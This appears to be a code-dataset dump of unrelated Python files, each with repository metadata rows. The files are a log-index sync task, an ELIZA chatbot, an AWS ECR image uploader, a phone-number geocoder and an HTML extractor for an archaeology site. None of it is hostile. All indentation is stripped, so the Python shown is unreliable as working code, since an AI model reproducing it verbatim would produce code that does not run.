logger.info("[sync_index_set_mapping_cache] index_set({}) sync success".format(index_set_id))
with ThreadPoolExecutor() as executor:
executor.map(sync_mapping_cache, index_set_id_list)
logger.info("[sync_index_set_mapping_cache] end")
@periodic_task(run_every=crontab(minute="0", hour="2"))
def sync_index_set_mapping_snapshot():
logger.info("[sync_index_set_mapping_snapshot] start")
index_set_list = LogIndexSet.objects.filter(is_active=True)
for index_set in index_set_list:
try:
index_set.sync_fields_snapshot(pre_check_enable=False)
except ApiResultError as e:
# 当数据平台返回为无法获取元数据报错情况
if e.code in [BkDataErrorCode.STORAGE_TYPE_ERROR, BkDataErrorCode.COULD_NOT_GET_METADATA_ERROR]:
index_set.is_active = False
index_set.save()
logger.exception(
f"[sync_index_set_mapping_snapshot] index_set({index_set.index_set_id} call mapping error: {e})"
)
continue
except Exception as e: # pylint: disable=broad-except
logger.exception(
"[sync_index_set_mapping_snapshot] index_set({}) sync failed: {}".format(index_set.index_set_id, e)
)
continue
logger.info("[sync_index_set_mapping_snapshot] index_set({}) sync success".format(index_set.index_set_id))
logger.info("[sync_index_set_mapping_snapshot] end")
@task(ignore_result=True)
def sync_single_index_set_mapping_snapshot(index_set_id=None): # pylint: disable=function-name-too-long
try:
index_set_obj = LogIndexSet.objects.get(index_set_id=index_set_id)
except LogIndexSet.DoesNotExist:
logger.exception(f"[sync_single_index_set_mapping_snapshot]index_set({index_set_id}) not exist")
else:
try:
index_set_obj.sync_fields_snapshot()
except Exception as e: # pylint: disable=broad-except
logger.exception(
f"[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync failed: {e}"
)
logger.info(f"[sync_single_index_set_mapping_snapshot] index_set({index_set_obj.index_set_id}) sync success")
| 50.625 | 117 | 0.734156 | 0 | 0 | 0 | 0 | 2,943 | 0.596473 | 0 | 0 | 2,588 | 0.524524 |
17ce1ca456408cd57b564d3fa90a6dbc05eaed30 | 13,700 | py | Python | eliza.py | lucasmelin/eliza | 878ea25f833ccd1cc439ead01c786c920b9bd078 | [
"MIT"
] | null | null | null | eliza.py | lucasmelin/eliza | 878ea25f833ccd1cc439ead01c786c920b9bd078 | [
"MIT"
] | null | null | null | eliza.py | lucasmelin/eliza | 878ea25f833ccd1cc439ead01c786c920b9bd078 | [
"MIT"
] | null | null | null | # https://sites.google.com/view/elizagen-org/the-original-eliza
from dataclasses import dataclass
from typing import List, Pattern
import re
import random
from rich.console import Console
from rich.panel import Panel
from time import sleep
class Eliza:
def __init__(self):
pass
def translate(self, str, table):
words = [table.get(word, word) for word in str.split(" ")]
return " ".join(words)
def respond(self, query):
for topic in topics:
match = topic.statement.match(query)
if match:
response = random.choice(topic.responses)
if "{0}" not in response:
return response
replacements = self.translate(match.group(1), subject)
return response.format(replacements).capitalize()
subject = {
"am": "are",
"was": "were",
"i": "you",
"i'd": "you would",
"i've": "you have",
"i'll": "you will",
"i'm": "you are",
"my": "your",
"are": "am",
"you've": "I have",
"you'll": "I will",
"your": "my",
"yours": "mine",
"you": "me",
"me": "you",
}
@dataclass
class Topic:
statement: Pattern
responses: List[str]
topics = [
Topic(
re.compile(r"I need (.*)", re.IGNORECASE),
[
"Why do you need {0}?",
"Would it really help you to get {0}?",
"Are you sure you need {0}?",
],
),
Topic(
re.compile(r"Why don\'?t you ([^\?]*)\??", re.IGNORECASE),
[
"Do you really think I don't {0}?",
"Perhaps eventually I will {0}.",
"Do you really want me to {0}?",
],
),
Topic(
re.compile(r"Why can\'?t I ([^\?]*)\??", re.IGNORECASE),
[
"Do you think you should be able to {0}?",
"If you could {0}, what would you do?",
"I don't know -- why can't you {0}?",
"Have you really tried?",
],
),
Topic(
re.compile(r"I can\'?t (.*)", re.IGNORECASE),
[
"How do you know you can't {0}?",
"Perhaps you could {0} if you tried.",
"What would it take for you to {0}?",
],
),
Topic(
re.compile(r"I am feeling (.*)", re.IGNORECASE),
[
"Did you come to me because you are {0}?",
"How long have you been {0}?",
"How do you feel about being {0}?",
],
),
Topic(
re.compile(r"I\'?m feeling (.*)", re.IGNORECASE),
[
"How does being {0} make you feel?",
"Do you enjoy being {0}?",
"Why do you tell me you're {0}?",
"Why do you think you're {0}?",
],
),
Topic(
re.compile(r"I am (.*)", re.IGNORECASE),
[
"Did you come to me because you are {0}?",
"How long have you been {0}?",
"How do you feel about being {0}?",
],
),
Topic(
re.compile(r"I\'?m (.*)", re.IGNORECASE),
[
"How does being {0} make you feel?",
"Do you enjoy being {0}?",
"Why do you tell me you're {0}?",
"Why do you think you're {0}?",
],
),
Topic(
re.compile(r"Are you ([^\?]*)\??", re.IGNORECASE),
[
"Why does it matter whether I am {0}?",
"Would you prefer it if I were not {0}?",
"Perhaps you believe I am {0}.",
"I may be {0} -- what do you think?",
"Why are you interested in whether or not I am {0}?",
],
),
Topic(
re.compile(r"What (.*)", re.IGNORECASE),
[
"Why do you ask?",
"How would an answer to that help you?",
"What do you think?",
],
),
Topic(
re.compile(r"How (.*)", re.IGNORECASE),
[
"How do you suppose?",
"Perhaps you can answer your own question.",
"What is it you're really asking?",
],
),
Topic(
re.compile(r"Because (.*)", re.IGNORECASE),
[
"Is that the real reason?",
"What other reasons come to mind?",
"Does that reason apply to anything else?",
"If {0}, what else must be true?",
],
),
Topic(
re.compile(r"(.*) sorry (.*)", re.IGNORECASE),
[
"There are many times when no apology is needed.",
"What feelings do you have when you apologize?",
"Please don't apologize.",
],
),
Topic(
re.compile(r"Hello(.*)", re.IGNORECASE),
[
"Hello... I'm glad you could drop by today.",
"Hi there... how are you today?",
"Hello, how are you feeling today?",
],
),
Topic(
re.compile(r"I think (.*)", re.IGNORECASE),
["Do you doubt {0}?", "Do you really think so?", "But you're not sure {0}?"],
),
Topic(
re.compile(r"(.*) friend (.*)", re.IGNORECASE),
[
"Tell me more about your friends.",
"When you think of a friend, what comes to mind?",
"Why don't you tell me about a childhood friend?",
],
),
Topic(
re.compile(r"Yes", re.IGNORECASE),
["You seem quite sure.", "OK, but can you elaborate a bit?"],
),
Topic(
re.compile(r"(.*) computer(.*)", re.IGNORECASE),
[
"Are you really talking about me?",
"Does it seem strange to talk to a computer?",
"How do computers make you feel?",
"Do you feel threatened by computers?",
"Do computers worry you?",
],
),
Topic(
re.compile(r"Is it (.*)", re.IGNORECASE),
[
"Do you think it is {0}?",
"Perhaps it's {0} -- what do you think?",
"If it were {0}, what would you do?",
"It could well be that {0}.",
],
),
Topic(
re.compile(r"It is (.*)", re.IGNORECASE),
[
"You seem very certain.",
"If I told you that it probably isn't {0}, what would you feel?",
],
),
Topic(
re.compile(r"Can you ([^\?]*)\??", re.IGNORECASE),
[
"What makes you think I can't {0}?",
"If I could {0}, then what?",
"Why do you ask if I can {0}?",
],
),
Topic(
re.compile(r"Can I ([^\?]*)\??", re.IGNORECASE),
[
"Perhaps you don't want to {0}.",
"Do you want to be able to {0}?",
"If you could {0}, would you?",
],
),
Topic(
re.compile(r"You are (.*)", re.IGNORECASE),
[
"Why do you think I am {0}?",
"Does it please you to think that I'm {0}?",
"Perhaps you would like me to be {0}.",
"Perhaps you're really talking about yourself?",
],
),
Topic(
re.compile(r"You\'?re (.*)", re.IGNORECASE),
[
"Why do you say I am {0}?",
"Why do you think I am {0}?",
"Are we talking about you, or me?",
],
),
Topic(
re.compile(r"I don\'?t (.*)", re.IGNORECASE),
["Don't you really {0}?", "Why don't you {0}?", "Do you want to {0}?"],
),
Topic(
re.compile(r"I feel (.*)", re.IGNORECASE),
[
"Good, tell me more about these feelings.",
"Do you often feel {0}?",
"When do you usually feel {0}?",
"When you feel {0}, what do you do?",
],
),
Topic(
re.compile(r"I have (.*)", re.IGNORECASE),
[
"Why do you tell me that you've {0}?",
"Have you really {0}?",
"Now that you have {0}, what will you do next?",
],
),
Topic(
re.compile(r"I would (.*)", re.IGNORECASE),
[
"Could you explain why you would {0}?",
"Why would you {0}?",
"Who else knows that you would {0}?",
],
),
Topic(
re.compile(r"Is there (.*)", re.IGNORECASE),
[
"Do you think there is {0}?",
"It's likely that there is {0}.",
"Would you like there to be {0}?",
],
),
Topic(
re.compile(r"My (.*)", re.IGNORECASE),
[
"I see, your {0}.",
"Why do you say that your {0}?",
"When your {0}, how do you feel?",
],
),
Topic(
re.compile(r"You (.*)", re.IGNORECASE),
[
"We should be discussing you, not me.",
"Why do you say that about me?",
"Why do you care whether I {0}?",
],
),
Topic(
re.compile(r"Why (.*)", re.IGNORECASE),
["Why don't you tell me the reason why {0}?", "Why do you think {0}?"],
),
Topic(
re.compile(r"I want (.*)", re.IGNORECASE),
[
"What would it mean to you if you got {0}?",
"Why do you want {0}?",
"What would you do if you got {0}?",
"If you got {0}, then what would you do?",
],
),
Topic(
re.compile(r"(.*) mother(.*)", re.IGNORECASE),
[
"Tell me more about your mother.",
"What was your relationship with your mother like?",
"How do you feel about your mother?",
"How does this relate to your feelings today?",
"Good family relations are important.",
],
),
Topic(
re.compile(r"(.*) father(.*)", re.IGNORECASE),
[
"Tell me more about your father.",
"How did your father make you feel?",
"How do you feel about your father?",
"Does your relationship with your father relate to your feelings today?",
"Do you have trouble showing affection with your family?",
],
),
Topic(
re.compile(r"(.*) brother(.*)", re.IGNORECASE),
[
"Tell me more about your brother.",
"What was your relationship with your brother like?",
"How do you feel about your brother?",
"How does this relate to your feelings today?",
"Good family relations are important.",
],
),
Topic(
re.compile(r"(.*) sister(.*)", re.IGNORECASE),
[
"Tell me more about your sister.",
"How did your sister make you feel?",
"How do you feel about your sister?",
"Does your relationship with your sister relate to your feelings today?",
"Do you have trouble showing affection with your family?",
],
),
Topic(
re.compile(r"(.*) child(.*)", re.IGNORECASE),
[
"Did you have close friends as a child?",
"What is your favorite childhood memory?",
"Do you remember any dreams or nightmares from childhood?",
"Did the other children sometimes tease you?",
"How do you think your childhood experiences relate to your feelings today?",
],
),
Topic(
re.compile(r"(.*) I remember (.*)", re.IGNORECASE),
[
"Does thinking of that bring anything else to mind?",
"What reminded you of that just now?",
],
),
Topic(
re.compile(r"(.*) always (.*)", re.IGNORECASE),
[
"Can you think of a specific instance?",
"Really -- always?",
],
),
Topic(
re.compile(r"(.*)\?", re.IGNORECASE),
[
"Why do you ask that?",
"Please consider whether you can answer your own question.",
"Perhaps the answer lies within yourself?",
"Why don't you tell me?",
],
),
Topic(
re.compile(r"quit", re.IGNORECASE),
[
"Thank you for talking with me.",
"Good-bye.",
"Thank you, have a good day!",
],
),
Topic(
re.compile(r"(.*)", re.IGNORECASE),
[
"Please tell me more.",
"Let's change focus a bit... Tell me about your family.",
"Can you elaborate on that?",
"Why do you say that {0}?",
"I see.",
"Very interesting.",
"{0}.",
"I see. And what does that tell you?",
"How does that make you feel?",
"How do you feel when you say that?",
"Go on.",
],
),
]
def format_statement(statement):
s = statement.rstrip("!.")
return s.lower()
def eliza_say(console, statement, typing_min=1, typing_max=3, color="green"):
with console.status(f"[bold {color}]Eliza is typing...", spinner="point"):
typing_time = random.uniform(typing_min, typing_max)
sleep(typing_time)
console.print(f"[bold {color}]{statement}")
def program():
console = Console()
console.print("[light_green]Eliza", justify="center", style="bold")
panel = Panel('[orange1]Talk to Eliza by typing in plain English, using normal upper and lower-case letters and punctuation. Enter "quit" when done.')
console.print(panel)
eliza_say(console, "Hello, I am Eliza. How are you feeling today?")
s = ""
therapist = Eliza()
while s != "quit":
try:
s = input("> ")
s = format_statement(s)
# This Exception is raised with Ctrl+Z
except EOFError:
s = "quit"
print(s)
eliza_say(console, therapist.respond(s))
#print(therapist.respond(s))
if __name__ == "__main__":
program()
| 30.37694 | 154 | 0.480803 | 649 | 0.047372 | 0 | 0 | 71 | 0.005182 | 0 | 0 | 6,689 | 0.488248 |
17cf03e398e39d203c9ebbce60b6f35bd144eb35 | 5,110 | py | Python | aws_artifact_copy/services/ecr.py | schlarpc/aws-artifact-copy | cd8a57db3f6e4636dc6f18b3f5b9534c907f9371 | [
"MIT"
] | null | null | null | aws_artifact_copy/services/ecr.py | schlarpc/aws-artifact-copy | cd8a57db3f6e4636dc6f18b3f5b9534c907f9371 | [
"MIT"
] | null | null | null | aws_artifact_copy/services/ecr.py | schlarpc/aws-artifact-copy | cd8a57db3f6e4636dc6f18b3f5b9534c907f9371 | [
"MIT"
] | null | null | null | import argparse
import hashlib
import json
import os
import sys
import tarfile
import trio
from ..common.botocore import (
create_async_session,
create_async_client,
partial_client_methods,
)
from ..common.serialization import json_dumps_canonical
async def upload_file(ecr, limit, fctx) -> str:
async with limit:
with fctx as f:
upload_config = await ecr.initiate_layer_upload()
first_byte = 0
hasher = hashlib.sha256()
while chunk := f.read(upload_config["partSize"]):
await ecr.upload_layer_part(
uploadId=upload_config["uploadId"],
partFirstByte=first_byte,
partLastByte=first_byte + len(chunk) - 1,
layerPartBlob=chunk,
)
first_byte = first_byte + len(chunk)
hasher.update(chunk)
digest = f"sha256:{hasher.hexdigest()}"
try:
await ecr.complete_layer_upload(
uploadId=upload_config["uploadId"],
layerDigests=[digest],
)
except ecr.exceptions.LayerAlreadyExistsException:
# pushed from another process running concurrently, maybe?
pass
return digest
async def find_missing_layers(ecr, digests: list[str]) -> frozenset[str]:
response = await ecr.batch_check_layer_availability(
layerDigests=digests,
)
available_digests = frozenset(
layer["layerDigest"]
for layer in response["layers"]
if layer["layerAvailability"] == "AVAILABLE"
)
return frozenset(digests) - available_digests
def parse_original_manifest(stream):
manifest = json.load(stream)[0]
yield {
"path": manifest["Config"],
# HACK assumption about streamLayeredImage format
"digest": f"sha256:{manifest['Config'].split('.')[0]}",
}
for layer in manifest["Layers"]:
yield {
"path": layer,
# HACK assumption about streamLayeredImage format
"digest": f"sha256:{layer.split('/')[-2]}",
}
async def upload_image(args: argparse.Namespace) -> str:
async with create_async_client("ecr") as ecr_unwrapped:
ecr = partial_client_methods(ecr_unwrapped, repositoryName=args.repository_name)
with tarfile.open(args.source) as tf:
index = {m.name: m for m in tf.getmembers()}
with tf.extractfile(index["manifest.json"]) as f:
layers = list(parse_original_manifest(f))
manifest = json_dumps_canonical(
{
"schemaVersion": 2,
"config": {
"mediaType": "application/vnd.oci.image.config.v1+json",
"digest": layers[0]["digest"],
"size": index[layers[0]["path"]].size,
},
"layers": [
{
"mediaType": "application/vnd.oci.image.layer.v1.tar",
"digest": layer["digest"],
"size": index[layer["path"]].size,
}
for layer in layers[1:]
],
}
)
manifest_digest = f"sha256:{hashlib.sha256(manifest).hexdigest()}"
response = await ecr.batch_get_image(
imageIds=[{"imageDigest": manifest_digest}],
)
if response["images"]:
return manifest_digest
missing_layers = await find_missing_layers(
ecr, [layer["digest"] for layer in layers]
)
async with trio.open_nursery() as nursery:
limit = trio.CapacityLimiter(args.upload_concurrency)
for layer in layers:
if layer["digest"] not in missing_layers:
continue
nursery.start_soon(
upload_file, ecr, limit, tf.extractfile(index[layer["path"]])
)
try:
await ecr.put_image(
imageManifest=manifest.decode("utf-8"),
imageManifestMediaType="application/vnd.oci.image.manifest.v1+json",
imageDigest=manifest_digest,
)
except ecr.exceptions.ImageAlreadyExistsException:
# pushed from another process running concurrently, maybe?
pass
return manifest_digest
def get_args(argv):
parser = argparse.ArgumentParser(f"{os.path.basename(sys.argv[0])} ecr")
parser.add_argument("source")
parser.add_argument(
"--format", choices=["nixpkgs-streamlayeredimage"], required=True
)
parser.add_argument("--repository-name", required=True)
parser.add_argument("--upload-concurrency", type=int, default=10)
return parser.parse_args(argv)
async def main(argv=None):
args = get_args(argv)
print(await upload_image(args))
| 35 | 88 | 0.553816 | 0 | 0 | 456 | 0.089237 | 0 | 0 | 3,974 | 0.777691 | 923 | 0.180626 |
17cfb7def19232ffc27b0f1860e91472d28ccd63 | 186 | py | Python | iniciante/1132.py | samucosta13/URI-Online-Judge | d3dc0c4c3ccf260e02cb3705a11226cbddffb90b | [
"MIT"
] | 2 | 2021-05-28T18:52:53.000Z | 2021-06-04T19:30:39.000Z | iniciante/1132.py | samucosta13/URI-Online-Judge | d3dc0c4c3ccf260e02cb3705a11226cbddffb90b | [
"MIT"
] | null | null | null | iniciante/1132.py | samucosta13/URI-Online-Judge | d3dc0c4c3ccf260e02cb3705a11226cbddffb90b | [
"MIT"
] | null | null | null | X = int(input())
Y = int(input())
soma = 0
if X > Y:
troca = Y
Y = X
X = troca
sam = X
while sam <= Y:
if sam%13 != 0:
soma = soma + sam
sam += 1
print(soma)
| 13.285714 | 25 | 0.462366 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
17d0f29d3c45101f706a5d553869a8adc551e247 | 217 | py | Python | InformationSecurity/phone-number.py | eduardormonteiro/PythonPersonalLibrary | 561733bb8305c4e25a08f99c28b60ec77251ad67 | [
"MIT"
] | null | null | null | InformationSecurity/phone-number.py | eduardormonteiro/PythonPersonalLibrary | 561733bb8305c4e25a08f99c28b60ec77251ad67 | [
"MIT"
] | null | null | null | InformationSecurity/phone-number.py | eduardormonteiro/PythonPersonalLibrary | 561733bb8305c4e25a08f99c28b60ec77251ad67 | [
"MIT"
] | null | null | null | import phonenumbers
from phonenumbers import geocoder
phone = input('type phone number format(+551100000000): ')
phone_number = phonenumbers.parse(phone)
print(geocoder.description_for_number(phone_number, 'pt'))
| 21.7 | 58 | 0.801843 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 47 | 0.21659 |
17d3a82fb3f622128e484ca6ec7f7b9d2a13f56e | 20,307 | py | Python | src/extract_old_site/modules/standard_text_chapter.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | 1 | 2020-10-01T01:07:11.000Z | 2020-10-01T01:07:11.000Z | src/extract_old_site/modules/standard_text_chapter.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | null | null | null | src/extract_old_site/modules/standard_text_chapter.py | aychen99/Excavating-Occaneechi-Town | 6e864ca69ff1881554eb4c88aebed236bafbeaf4 | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
from pathlib import Path
import os
def extract_page_content(html_string, folder_path_str):
    """Extract contents of a page from a report*b.html file.

    Parameters
    ----------
    html_string : str
        The HTML content of the report*b.html page to be extracted, as a str.
    folder_path_str : str
        Str indicating the current html str's parent folder within /dig/html.

    Returns
    -------
    extracted_paragraphs : list
        List of dicts, one per extracted element, each with a 'type' key
        ('italic-title' or 'paragraph') and a 'content' key holding the
        extracted text/HTML as a string.
    """
    # html5lib is used (rather than html.parser) because the legacy pages
    # omit closing tags; html5lib recovers them the way a browser would.
    soup = BeautifulSoup(html_string, 'html5lib')
    folder_path = Path(folder_path_str)
    extracted_paragraphs = []

    # Replace all relative links in <a> tags with full ones to help generation.
    # NOTE(review): assumes every <a> carries an 'href' attribute; a bare
    # named anchor (<a name="...">) would raise KeyError here -- confirm
    # against the source data.
    for a in soup.find_all('a'):
        new_href = os.path.normpath(folder_path / a['href'])
        new_href = Path(new_href).as_posix()
        a['href'] = new_href
        # Drop frameset-era 'target' attributes; bs4's __delitem__ is a
        # no-op when the attribute is absent, so this is safe.
        del a['target']

    # Extract the page's paragraph contents
    for content in soup.body.contents:
        if isinstance(content, str) and content.strip() == '':
            # Skip whitespace-only text nodes (e.g. a bare '\n' between tags)
            pass
        elif content.name == 'p':
            inner_html = str(content).replace('<p>', '').replace('</p>', '')
            # 'None' guards against paragraphs whose stringified content is
            # the literal text "None" (seen in the legacy pages).
            if (inner_html.strip() == '' or inner_html == 'None'):
                # Skip processing an empty <p> tag
                pass
            else:
                p_contents = [
                    item
                    for item in content.contents
                    if str(item).strip() != ''
                ]
                if len(p_contents) == 1 and p_contents[0].name == 'i':
                    # Paragraph tag contains a section title in italics
                    extracted_paragraphs.append({
                        'type': 'italic-title',
                        'content': str(p_contents[0].string)
                    })
                else:
                    # Paragraph tag contains a normal paragraph and text.
                    # Newlines need to be removed during extraction.
                    lines = str(content).split('\n')
                    lines = [
                        line.replace('<p>', '').replace('</p>', '')
                        for line in lines
                    ]
                    # Collapse double spaces. The pattern must be TWO
                    # spaces -- a single-space pattern (as previously
                    # written) is a no-op and removes nothing.
                    lines = [
                        line.replace('  ', ' ').strip()
                        for line in lines
                        if line.strip() != ''
                    ]
                    p_inner_html = ' '.join(lines)
                    extracted_paragraphs.append({
                        'type': 'paragraph',
                        'content': p_inner_html
                    })
        elif content.name == 'ul' or content.name == 'ol':
            list_items = str(content)  # Keep <ul> or <ol> tags
            extracted_paragraphs.append({
                'type': 'paragraph',
                'content': list_items.strip()
            })
        elif content.name == 'table':
            table = str(content)  # Keep table as is, mainly for data downloads
            extracted_paragraphs.append({
                'type': 'paragraph',
                'content': table.strip()
            })
        else:
            # TODO: other top-level tags (headings, images, etc.) are
            # currently dropped silently.
            pass

    return extracted_paragraphs
def extract_page_title(html_string):
    """Extract the page title from a report*a.html file.

    Parameters
    ----------
    html_string : str
        The HTML content of the report*a.html page to be extracted, as a str.

    Returns
    -------
    str
        Page title as a string, without any HTML tags.
    """
    # The title lives at <body><center><i>...</i></center> in these pages.
    parsed = BeautifulSoup(html_string, 'html.parser')
    title_tag = parsed.body.center.i
    return str(title_tag.string)
def extract_page_number(html_string):
    """Extract the page number from a report*c.html file.

    Parameters
    ----------
    html_string : str
        The HTML content of the report*c.html page to be extracted, as a str.

    Returns
    -------
    str
        Page number as a string, to cover both Arabic and Roman numerals.
    """
    parsed = BeautifulSoup(html_string, 'html.parser')
    # The footer renders e.g. "Page 12" or "Page iv"; strip the label prefix.
    raw_label = str(parsed.body.center.string)
    return raw_label.replace('Page ', '')
def extract_sidebar(html_string, folder_path_str, parent_body_page_name):
    """Extract sidebar info from a "index*_*.html" file.
    Parameters
    ----------
    html_string : str
        The HTML content of the index*_*.html page to be extracted, as a str.
    folder_path_str : str
        Str indicating the current html str's parent folder within /dig/html.
    parent_body_page_name: str
        The name of the body*_*.html page that loads this sidebar as a frame.
    Returns
    -------
    dict
        Dict with this sidebar's name, author, sections, and current section.
    """
    # Note: because the original html content did not have any closing </p>
    # tags, this function depends on using html5lib for proper parsing.
    soup = BeautifulSoup(html_string, 'html5lib')
    folder_path = Path(folder_path_str)
    # Get lines/sections from the sidebar, which are contained in <p> tags
    paragraphs = soup.body.find_all('p')
    # Remove empty paragraphs
    paragraphs = [
        p
        for p in paragraphs
        if str(p).replace('<p>', '').replace('</p>', '').strip() != ''
    ]
    # Use b directly, rather than b.string, to account for Getting Started,
    # where the title may include an <i> tag and thus have no b.string.
    current_module_full_name = (
        str(paragraphs[0].b).replace("<b>", "")
        .replace("</b>", "")
        .strip()
    )
    moduleAuthor = None
    sections = []
    current_section = None
    # Index of the <p> tag that holds the section links; -1 means "none".
    p_tag_with_sections = -1
    if len(paragraphs) == 1:
        # Deal with the edge case of the foreword in part 0
        if paragraphs[0].find('br'):
            # Author is the text after the last <br>/<br/> in the paragraph.
            moduleAuthor = (
                str(paragraphs[0]).split('<br/>')[-1]
                .split('<br>')[-1]
                .replace('</p>', '')
                .strip()
            )
        # If we aren't in the edge case of the foreword, then
        # only the full module name is in this sidebar, no links or sections.
        # Thus, create one section object to represent this one section.
        # Note that this may lead to inconsistency between the names
        # in report*a.html, tabs*.html, and this sidebar index*.html.
        section_object = {
            'name': current_module_full_name,
            'path': (folder_path / parent_body_page_name).as_posix(),
            'subsections': []
        }
        current_section = section_object
        sections.append(section_object)
    elif len(paragraphs) == 2:
        # Check to see if it's a combination of the module title & author(s),
        # or of the module title and section links.
        if len(paragraphs[1].find_all('a')) == 0:
            moduleAuthor = str(paragraphs[1].string).strip()
        else:
            p_tag_with_sections = 1
    else:
        # Three or more paragraphs: title, author, then section links.
        moduleAuthor = str(paragraphs[1].string).strip()
        p_tag_with_sections = 2
    if p_tag_with_sections > 0:
        links_contents = paragraphs[p_tag_with_sections].contents
        i = 0
        # Stops one element early; presumably the last element is a trailing
        # whitespace/newline node -- TODO confirm against the source pages.
        while i < len(links_contents) - 1:
            section_object = None
            content = links_contents[i]
            if content.name == 'a':
                # A linked section on another page.
                section_object = {
                    'name': str(content.string).strip(),
                    'path': (folder_path / str(content['href'])).as_posix(),
                    'subsections': []
                }
            elif isinstance(content, str) and content.strip() != '':
                # Then it's the link to the current page,
                # without an <a> tag around it.
                section_object = {
                    'name': str(content.string).strip(),
                    'path': (folder_path / parent_body_page_name).as_posix(),
                    'subsections': []
                }
                current_section = section_object
            if section_object:
                if (
                    i != 0 and
                    ('\xa0' in links_contents[i-1] or '\xa0' in content)
                ):
                    # \xa0 is a non-breaking space (&nbsp;) in HTML, used to
                    # indent subsection links under their parent section.
                    # This covers both the case where there's an <a> tag around
                    # the title, and when it's the current page so there's no
                    # <a> tag. Relies on fact that no sidebar has more than
                    # three levels of links, i.e. subsections do not themselves
                    # have subsections.
                    sections[-1]['subsections'].append(section_object)
                else:
                    sections.append(section_object)
            i += 1
    return {
        'currentModuleFullName': current_module_full_name,
        'moduleAuthor': moduleAuthor,
        'sections': sections,
        'currentSection': current_section
    }
def extract_topbar(html_string, folder_path_str, parent_tab_page_name):
    """Extract info on the modules of a chapter from a tabs*.html file.

    Parameters
    ----------
    html_string : str
        The HTML content of the tabs*.html page, as a str.
    folder_path_str : str
        Str indicating the current html str's parent folder within /dig/html.
    parent_tab_page_name : str
        The name of the tab*.html page that loads this topbar as a frame.

    Returns
    -------
    dict
        Dict with the chapter's modules ("modules") and the module currently
        being displayed ("currentModule", or None if not found).
    """
    soup = BeautifulSoup(html_string, 'html5lib')
    folder_path = Path(folder_path_str)
    links_contents = soup.body.b.contents
    # Change the parent_tab_page_name so the extraction always uses the first
    # page of a module (tab0.html, tab1.html, etc.), rather than pages like
    # tab0_3.html, when recording the module's path.
    part_nums = parent_tab_page_name.split('_')
    if len(part_nums) > 1:
        parent_tab_page_name = part_nums[0] + ".html"
    modules = []
    current_module = None
    for element in links_contents:
        if isinstance(element, str):
            # Bare text (separated by '|' characters) marks the current
            # module, which is rendered without a link to itself.
            stripped_string = element.replace('|', '').strip()
            if stripped_string != '':
                # Is the current module, without a link to it
                module_obj = {
                    'moduleShortName': stripped_string,
                    'path': (folder_path / parent_tab_page_name).as_posix()
                }
                modules.append(module_obj)
                current_module = module_obj
        elif element.name == 'a':
            if 'index.html' in element['href'] or 'copyright.html' in element['href']:
                # Skip non-module links (site index and copyright pages).
                pass
            elif '/' in element['href']:
                # Bug fix: the message previously lacked a space before
                # "when", running the file path and text together.
                raise Exception('/ character found in hyperlink in the topbar of '
                                + (folder_path / parent_tab_page_name).as_posix()
                                + ' when it was not supposed to be.')
            else:
                # A linked (non-current) module in the same chapter folder.
                modules.append({
                    'moduleShortName': str(element.string).strip(),
                    'path': (folder_path / element['href']).as_posix()
                })
    return {
        "modules": modules,
        "currentModule": current_module
    }
def extract_frames(html_string, full_current_dir_path, readfile):
    """Read in data from the contained frames in a report#.html page."""
    parsed = BeautifulSoup(html_string, 'html.parser')
    # Read every <frame> under the <frameset>, in document order.
    return [
        readfile(frame['src'], full_current_dir_path)
        for frame in parsed.frameset.find_all(['frame'])
    ]
def get_body_page_html_contents(html_string, current_dir_path, dig_parent_dir_path, readfile, has_page_num=True):
    """Extract all parts of a body*_*.html page and its contained frames.
    Parameters
    ----------
    html_string : str
        Result of reading a body*_*.html file
    current_dir_path : str
        Directory of the body*_*.html file in Posix Path format
        (e.g. "/dig/html/part2").
    dig_parent_dir_path : Path
        Containing directory of the /dig folder as a Path object, e.g.
        if body0_1.html is found in "C:\\Users\\Dev\\dig\\html\\part2",
        then dig_parent_dir_path is a WindowsPath('C:/Users/Dev').
    readfile : function
        Function to read any file based on the file name or folder path.
    has_page_num : bool
        Whether the report page includes a third frame (report*c.html)
        holding the page number.
    Returns
    -------
    dict
        Dict with the raw html strings 'sidebar_html', 'reporta_html',
        'reportb_html', and (when has_page_num) 'reportc_html'.
    """
    soup = BeautifulSoup(html_string, 'html5lib')
    # frames[0] is the sidebar (index*.html); frames[1] is the report page.
    frames = soup.find_all('frame')
    full_current_dir_path = dig_parent_dir_path / ("." + current_dir_path)
    sidebar_html_string = readfile(frames[0]['src'], full_current_dir_path)
    report_html_string = readfile(frames[1]['src'], full_current_dir_path)
    # The report's own frames are resolved relative to the report file.
    report_folder_path = (full_current_dir_path / frames[1]['src']).parent
    report_abc_content = extract_frames(report_html_string, report_folder_path, readfile)
    extracted_html_strs = {
        'sidebar_html': sidebar_html_string,
        'reporta_html': report_abc_content[0],
        'reportb_html': report_abc_content[1]
    }
    if has_page_num:
        extracted_html_strs['reportc_html'] = report_abc_content[2]
    return extracted_html_strs
def get_tab_page_html_contents(html_string, current_dir_path, dig_parent_dir_path, readfile, has_page_num=True):
    """Extract all parts of a tab*.html or tab*_*.html page and its frames.
    Parameters mirror get_body_page_html_contents; additionally returns the
    topbar html ('topbar_html') and the name of the body page that the tab
    page embeds ('body_page_name').
    """
    soup = BeautifulSoup(html_string, 'html5lib')
    # frames[0] is the topbar (tabs*.html); frames[1] is the body page.
    frames = soup.find_all('frame')
    full_current_dir_path = dig_parent_dir_path / ("." + current_dir_path)
    topbar_html_string = readfile(frames[0]['src'], full_current_dir_path)
    body_html_content = get_body_page_html_contents(
        readfile(frames[1]['src'], full_current_dir_path),
        current_dir_path,
        dig_parent_dir_path,
        readfile,
        has_page_num=has_page_num
    )
    extracted_html_strs = {
        'topbar_html': topbar_html_string,
        'sidebar_html': body_html_content['sidebar_html'],
        'reporta_html': body_html_content['reporta_html'],
        'reportb_html': body_html_content['reportb_html'],
        'body_page_name': frames[1]['src']
    }
    if has_page_num:
        extracted_html_strs['reportc_html'] = body_html_content['reportc_html']
    return extracted_html_strs
def process_tab_html_contents(
    html_strings, current_tab_page_name,
    current_dir_path, dig_parent_dir_path, readfile
):
    """Turn the raw html_strings from reading a tab.html file into a dict.
